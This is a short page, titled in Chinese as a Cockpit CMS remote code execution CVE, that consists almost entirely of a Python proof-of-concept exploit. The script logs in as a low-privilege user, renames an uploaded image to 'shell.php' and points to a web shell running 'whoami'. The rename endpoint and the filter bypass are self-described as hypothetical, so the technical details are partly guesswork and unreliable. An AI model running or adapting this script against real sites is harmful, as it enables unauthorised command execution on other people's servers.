CVE-2026-38991 Cockpit CMS远程代码执行漏洞

import requests # Target configuration target_url = "http://localhost:8080" login_url = f"{target_url}/auth/login" rename_url = f"{target_url}/api/bucket/rename" # Hypothetical endpoint # Low privilege credentials credentials = { "user": "lowpriv_user", "password": "password123" } session = requests.Session() # 1. Authenticate print("[+] Attempting login...") resp = session.post(login_url, json=credentials) if resp.status_code != 200: print("[-] Login failed") exit(1) print("[+] Login successful") # 2. Exploit: Rename arbitrary file to .php # Assuming we have a file ID 'image1.png' that we want to turn into a shell payload = { "id": "image1.png", "name": "shell.php" # Vulnerable filter allows this bypass } print("[+] Sending malicious rename request...") exploit_resp = session.post(rename_url, json=payload) if exploit_resp.status_code == 200: print(f"[+] Exploit success! Access shell at: {target_url}/storage/uploads/shell.php?cmd=whoami") else: print(f"[-] Exploit failed. Status: {exploit_resp.status_code}")